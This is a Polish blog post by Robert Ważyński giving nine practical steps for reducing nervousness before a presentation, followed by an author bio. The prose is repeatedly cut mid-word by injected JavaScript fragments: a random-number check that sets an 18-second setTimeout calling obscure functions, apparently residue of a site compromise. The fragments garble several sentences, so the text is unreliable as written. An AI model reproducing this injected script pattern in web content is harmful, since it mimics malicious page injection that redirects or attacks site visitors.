Jak radzić sobie z tremą przed prezentacją

Na początek dobra wiadomość dla Ciebie. (częsdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to tak rozpoczynam moje artykuły ale lubię przekazywać dobre informacje) Wszyscy, nawet najbardziej doświadczeni mówcy, przed wystąpieniem publicznym odczuwają zdenerwowanie. Za chwile poznasz kilka prostych kroków dzięki którym będziesz mniej się denerwować przed i w trakcie prezentacji.

Przed prezentacją, przygotuj się!

1. Poznaj dogłębnie temat. Jeśli tego nie zrobisz, audydom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torium zorientuje się, że masz luki w wiedzy, Ty się zdenerwujesz a publiczność dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to momentalnie wyczuje.

2. Dobrze opanuj treść wystąpienia, szczególnie dobrze przygotuj początek (pierwsze 5 minut). Możesz nawet nauczyć się na pamięć tekstu. Największa trema jest na początku, zatem po takim wstępie poczujesz się pewniej.

3. Przećwicz swoje przemówienie. Sprawdź ile masz czasu a ile materiału przygodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towałeś. Przygotuj więcej treści. Lepiej skrócić swoje wystąpienie niż stać przed publicznością i nie mieć już nic do zaprezendom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towania.

4. Zastanów się jakie pytania mogą paść ze strony słuchaczy i opracuj odpowiedzi na nie. Tak naprawdę Ty wiesz najlepiej o co mogą zapytać uczestnicy spotkania. Jeśli przed wystąpieniem solidnie przyłożysz się do tej części spotkania, okaże się, że przewidziałeś 9 pytań NA 10. Niesamowite? Sprawdź sam a się przekonasz!

5. Skontroluj pomieszczenie i sprzęt. Czy przy takim ustawieniu sali wszyscy będą widzieli Ciebie i np. ekran, czy działa rzutnik multimedialny, jak głośno chodzi klimatyzacja, czy oświetlenie jest wystarczające.

6. Pamiętaj O swoich notatkach i materiałach, które będziesz wykorzystywać podczas prezentacji. Nie możesz w trakcie przemówienie szukać czegoś nerwowo i na dodatek nie znaleźć!

7. Weź swoje „koło ratunkowe” (chusteczki, okulary czy talizman…)

8. Przyjdź wcześniej. Będziesz miał czas np. na ewentualne korekty w ustawieniu sali itp.

9. Stań przed lustrem i popraw swój wygląd.

Przed prezentacją: wypocznij, wyśpij się, ubierz się wygodnie, nie jedz zbyt wiele, nie napojów gazowanych 🙂

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

Leave a Reply